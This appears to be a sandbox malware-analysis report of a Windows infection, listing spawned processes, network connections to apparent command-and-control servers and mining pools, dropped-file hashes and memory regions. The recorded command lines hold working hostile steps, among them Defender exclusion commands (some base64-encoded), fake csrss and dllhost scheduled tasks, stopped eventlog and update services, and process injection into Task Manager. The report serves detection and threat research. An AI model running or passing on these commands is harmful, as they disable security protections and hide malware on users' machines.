C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 784
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2528 -ip 2528
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 804
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2528 -ip 2528
C:\Users\Admin\AppData\Local\Temp\1000570001\leg221.exe
"C:\Users\Admin\AppData\Local\Temp\1000570001\leg221.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_8.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_9.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p4632370330209207692137030328 -oextracted
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 644
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SysWOW64\timeout.exe
timeout /t 5
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1084 -s 2420
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1084 -ip 1084
C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe
"C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nsfA097.tmp" & del "C:\ProgramData\*.dll"" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2528 -ip 2528
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 892
C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 612
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe
"C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 972
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "FLWCUERA"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "FLWCUERA" binpath= "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe" start= "auto"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "FLWCUERA"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
conhost.exe
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 648
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 956
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 1068
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WSNKISKT"
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WSNKISKT"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMAA1ADcAMQAwADAAMQBcAEcAegB4AHoAdQBoAGUAagBkAGEAYgAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAARwB6AHgAegB1AGgAZQBqAGQAYQBiAC4AZQB4AGUAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABrAGoAaABrAGgAawBoAGsALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAGsAagBoAGsAaABrAGgAawAuAGUAeABlAA==
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjADUAVQBDACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBwAEIASwB1AEUAVwA1AHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAVQBtAGIAbgBvAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBhADEAbAAzADIAWgBtAFMASAB1ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjADUAVQBDACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBwAEIASwB1AEUAVwA1AHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAVQBtAGIAbgBvAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBhADEAbAAzADIAWgBtAFMASAB1ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6900" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe
C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 1148
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2528 -ip 2528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 1164
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| FI | 109.107.182.3:80 | 109.107.182.3 | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.182.107.109.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| DE | 20.113.35.45:38357 | tcp | |
| DE | 141.95.211.148:46011 | tcp | |
| US | 8.8.8.8:53 | 148.211.95.141.in-addr.arpa | udp |
| RU | 5.42.65.31:48396 | tcp | |
| DE | 185.172.128.19:80 | tcp | |
| HK | 154.92.15.189:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 172.67.206.188:443 | racerecessionrestrai.site | tcp |
| NL | 94.156.67.176:13781 | tcp | |
| DE | 185.172.128.79:80 | 185.172.128.79 | tcp |
| HK | 154.92.15.189:80 | app.alie3ksgaa.com | tcp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.213.67.172.in-addr.arpa | udp |
| US | 20.242.39.171:443 | tcp | |
| NL | 80.79.4.61:18236 | tcp | |
| NL | 80.79.4.61:18236 | tcp | |
| DE | 144.76.1.85:25894 | tcp | |
| US | 172.67.177.31:443 | tcp | |
| US | 8.8.8.8:53 | 31.177.67.172.in-addr.arpa | udp |
| NL | 80.79.4.61:18236 | tcp | |
| NL | 80.79.4.61:18236 | tcp | |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | server10.thestatsfiles.ru | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | stun.l.google.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| BG | 185.82.216.96:443 | server10.thestatsfiles.ru | tcp |
| US | 8.8.8.8:53 | walkinglate.com | udp |
| GB | 142.251.29.127:19302 | stun.l.google.com | udp |
| US | 104.21.23.184:443 | walkinglate.com | tcp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.216.82.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.29.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.23.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| BG | 185.82.216.96:443 | server10.thestatsfiles.ru | tcp |
| US | 8.8.8.8:53 | joxi.net | udp |
| US | 172.67.162.70:80 | joxi.net | tcp |
| US | 172.67.162.70:443 | joxi.net | tcp |
| US | 8.8.8.8:53 | 70.162.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| NL | 80.79.4.61:18236 | tcp | |
| NL | 80.79.4.61:18236 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 20.49.150.241:443 | tcp | |
| US | 8.8.8.8:53 | qualifiedbehaviorrykej.site | udp |
| US | 104.21.35.143:443 | qualifiedbehaviorrykej.site | tcp |
| US | 8.8.8.8:53 | 143.35.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | combinethemepiggerygoj.site | udp |
| US | 172.67.137.14:443 | combinethemepiggerygoj.site | tcp |
| US | 8.8.8.8:53 | 14.137.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | weedpairfolkloredheryw.site | udp |
| US | 104.21.40.14:443 | weedpairfolkloredheryw.site | tcp |
| US | 8.8.8.8:53 | 14.40.21.104.in-addr.arpa | udp |
| RU | 185.215.113.68:80 | tcp | |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| DE | 185.221.198.109:80 | 185.221.198.109 | tcp |
| NL | 195.20.16.153:80 | 195.20.16.153 | tcp |
| DE | 185.221.198.109:80 | 185.221.198.109 | tcp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 143.68.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.198.221.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.16.20.195.in-addr.arpa | udp |
| N/A | 20.49.150.241:443 | tcp | |
| US | 8.8.8.8:53 | zeph-eu2.nanopool.org | udp |
| N/A | 20.49.150.241:443 | tcp | |
| FR | 163.172.171.111:10943 | zeph-eu2.nanopool.org | tcp |
| NL | 80.79.4.61:18236 | tcp | |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 111.171.172.163.in-addr.arpa | udp |
| FR | 163.172.171.111:10943 | zeph-eu2.nanopool.org | tcp |
| NL | 80.79.4.61:18236 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | expenditureddisumilarwo.site | udp |
| US | 172.67.133.222:443 | expenditureddisumilarwo.site | tcp |
| US | 8.8.8.8:53 | 222.133.67.172.in-addr.arpa | udp |
| NL | 80.79.4.61:18236 | tcp | |
| NL | 80.79.4.61:18236 | tcp | |
| N/A | 185.172.128.90:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 5.42.64.33:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| GB | 173.222.13.40:80 | tcp | |
| GB | 96.17.179.193:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| NL | 80.79.4.61:18236 | tcp | |
| NL | 80.79.4.61:18236 | tcp | |
| US | 8.8.8.8:53 | 208.143.182.52.in-addr.arpa | udp |
| US | 172.67.177.31:443 | tcp | |
| US | 8.8.8.8:53 | udp |
Files
memory/4376-1-0x00000000006B0000-0x0000000000AB8000-memory.dmp
memory/4376-0-0x00000000006B0000-0x0000000000AB8000-memory.dmp
memory/4376-2-0x00000000006B0000-0x0000000000AB8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
| MD5 | e71c6ec2d3b302698ab773bcebffdce6 |
| SHA1 | 6d53138c3cbb5b25c35d2dbf4f72c9a5202d132c |
| SHA256 | 949290efa61151bdc86b73371718f8bcee7348ea0a04c272b841727b8766857d |
| SHA512 | 9430121a31bbd999ddbb6ad7a5fe7a4eb711ee40acc1b06cafb3cb1effe8d8660e72b6718277b943cbe22edd4e15f254fc77f70bf72132d33a5fd8a03c6e33e4 |
memory/4888-14-0x00000000000D0000-0x00000000004D8000-memory.dmp
memory/4376-13-0x00000000006B0000-0x0000000000AB8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
| MD5 | c8a13100238bb6863759fe63ee22f763 |
| SHA1 | 4f917c6f03bd47fe7e7cc6696e784cc197c39bf9 |
| SHA256 | befd0b9a0ff1481e7bfa5e0acb934af7e37ffaf8a3205dbc53487a9779906f86 |
| SHA512 | 52e77564e7e02560ac3db34fcc8ce5dbe177ef8fee7e94549445914e94c87503a6a4b77433337a402c025e96c79ebccfb71cfa0386a107e728c1fbb265b12fc7 |
memory/4888-16-0x00000000000D0000-0x00000000004D8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
| MD5 | 73ac24985a312bdff6c71c1fe7cffed1 |
| SHA1 | ce01343d352af9318db7ba950850d88383e7cbbe |
| SHA256 | 90fa2d23ecca8106478558c762845c190c424cb4a29ce07117a1213b9f331df3 |
| SHA512 | 5a8151e7427f2f59b6d9850ddb911466424fac03d18efc82a6243cfa2420868a67bbfc96759a53283540bc94b4435c409d65ea2dbfb8a15aa35d62e0399266b9 |
\??\c:\users\admin\appdata\local\temp\F59E91F8
| MD5 | 5cac70fbe2fc9869397bf1989e592841 |
| SHA1 | cc522bec3c1772269465799d35268630248e801b |
| SHA256 | 17e571023337ad513deb4d436c17573b6ab3c9ebf2a3e30425c3f5fa9a638806 |
| SHA512 | f56d8d7a996401404b850b6503960ea17d68fe56acbc06de8fa9c39b20dd7f01d24837283f459655ac4efb3da10a8864623cbb041ca9ad81bc9afd1ecf9b5fb9 |
memory/4888-17-0x00000000000D0000-0x00000000004D8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
| MD5 | e2f4faf11f08e6ae457f6d0dff9660a5 |
| SHA1 | cfc6f9f3a8461b66805e387326450d6814b83624 |
| SHA256 | 2f8e208a96e38c0865e767978caf02bd719e6acfb6c527dcdfc1e7f83a2e9835 |
| SHA512 | a66e391d48dc3599a4b90dda2cbb0439b72275df70cdab8777a2712e6b4b1c18def880b85a3b067ededb9c698c9b0676762f654ca88e5efab0996fab7ee4d98e |
C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
| MD5 | 28061ccdf1c5f3d004bef549d0bb7ed9 |
| SHA1 | 776fe17bebc79de0ee3eb3efc212e928dc8115f3 |
| SHA256 | b623f3923dcf18f8bb58dbdae5db40391a2d4db0cf4093586e4f9f44b9769679 |
| SHA512 | ed0180a8f19e01468b7fcf7b59046459894f9f0edb57079235f2b5668a8dc5dd62eb1cafadb50180ff14419c2bc37d133c6c5014ccd9064657391973cf5eb8cb |
C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
| MD5 | 37991fa1d01ed516250935f3ad784b06 |
| SHA1 | c437bc223f9df281ebda7b452aa33b407809411b |
| SHA256 | 06411b66dda61c99da3774203f0b8ccb264cf43d74bc85b2fb392b129c2cc0e4 |
| SHA512 | caee02ee820c70406dba4cca0e6876438fbe2e21ce1d83c4ba111e79f8bd5000aa51e7175c8964cba2a6b0136128a6a056f4c7099ace2643c68e7ba8fa9a73cf |
memory/2772-40-0x0000000073520000-0x0000000073CD0000-memory.dmp
memory/2772-39-0x0000000000770000-0x000000000086A000-memory.dmp
memory/2772-41-0x00000000051C0000-0x00000000051D0000-memory.dmp
memory/2772-42-0x0000000005080000-0x000000000517C000-memory.dmp
memory/2772-43-0x00000000051D0000-0x00000000052CC000-memory.dmp
memory/2772-44-0x00000000051D0000-0x00000000052C7000-memory.dmp
memory/2772-45-0x00000000051D0000-0x00000000052C7000-memory.dmp
memory/2772-53-0x00000000051D0000-0x00000000052C7000-memory.dmp
memory/2772-65-0x00000000051D0000-0x00000000052C7000-memory.dmp
memory/2772-69-0x00000000051D0000-0x00000000052C7000-memory.dmp
memory/2772-71-0x00000000051D0000-0x00000000052C7000-memory.dmp
memory/2772-85-0x00000000051D0000-0x00000000052C7000-memory.dmp
memory/2772-91-0x00000000051D0000-0x00000000052C7000-memory.dmp
memory/2772-95-0x00000000051D0000-0x00000000052C7000-memory.dmp
memory/2772-101-0x00000000051D0000-0x00000000052C7000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000545001\gold1234.exe
| MD5 | 82bbbf082f9f694ba643d08571ee6600 |
| SHA1 | b3f410bec583f82b571af6da3e9712a0face47b5 |
| SHA256 | 0f43bfb66b41f33c96611d09c326a98fd101714355ab9845d753bd0ed6246ec3 |
| SHA512 | ee81b0a42e88a937ca2fa40b8c7d3a48c78e3caf3e2739bf3103b73196757572868302eeb5a7dc542fb0e7aa3ebf09c0783b2c7d9b52d63cee1111f385de2119 |
memory/2772-103-0x00000000051D0000-0x00000000052C7000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000545001\gold1234.exe
| MD5 | 71268456c5e7f3c233caf9b10557fdc6 |
| SHA1 | 5bd9426bd7a105613d1ad3f69f0b7917f8e9e514 |
| SHA256 | 9e1bcb94f5f7f7eecfb13959d2676d04e17483638a23dec48381efbffe2015be |
| SHA512 | 9b6bbe4cc8dc232d874bf19af23b76c9fed595660ae68d7afd666e58dbf938a306015493c8c17c5b6b8fc9e447b01d4fcc554acd7e1513946c01c66875283c51 |
memory/2092-135-0x0000000073520000-0x0000000073CD0000-memory.dmp
memory/2092-133-0x0000000000D40000-0x0000000000DA4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000545001\gold1234.exe
| MD5 | 1bd0f35b3103ff0a27e0e24929e337b8 |
| SHA1 | d60212a74e177d366e1cb8687b87e5aff3333816 |
| SHA256 | cbf70ebebe929a6d91babdc68271d8dff7f55e1ae0ea184abffd1de8393b26f5 |
| SHA512 | 98cec282ec71144ce04736a4e3c46eb1adcf7c0dbbbcc213cb01818120cb2bc379e8d17f4f9cd0f69fd7e2bd7636e6b87745833febc21939ee7bdedd1837d0e6 |
memory/2772-99-0x00000000051D0000-0x00000000052C7000-memory.dmp
memory/2092-143-0x00000000057D0000-0x00000000057E0000-memory.dmp
memory/2772-97-0x00000000051D0000-0x00000000052C7000-memory.dmp
memory/2772-93-0x00000000051D0000-0x00000000052C7000-memory.dmp
memory/2772-89-0x00000000051D0000-0x00000000052C7000-memory.dmp
memory/2772-87-0x00000000051D0000-0x00000000052C7000-memory.dmp
memory/2772-83-0x00000000051D0000-0x00000000052C7000-memory.dmp
memory/2092-154-0x0000000003120000-0x0000000005120000-memory.dmp
memory/1956-161-0x0000000073520000-0x0000000073CD0000-memory.dmp
memory/1956-163-0x0000000005530000-0x00000000055C2000-memory.dmp
memory/1956-158-0x0000000005A00000-0x0000000005FA4000-memory.dmp
memory/1956-170-0x00000000056E0000-0x00000000056EA000-memory.dmp
memory/1956-168-0x00000000054C0000-0x00000000054D0000-memory.dmp
memory/2092-159-0x0000000073520000-0x0000000073CD0000-memory.dmp
memory/1956-152-0x0000000000400000-0x0000000000454000-memory.dmp
